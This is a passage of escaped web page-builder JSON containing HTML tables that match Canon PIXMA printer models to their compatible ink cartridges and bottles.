width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td 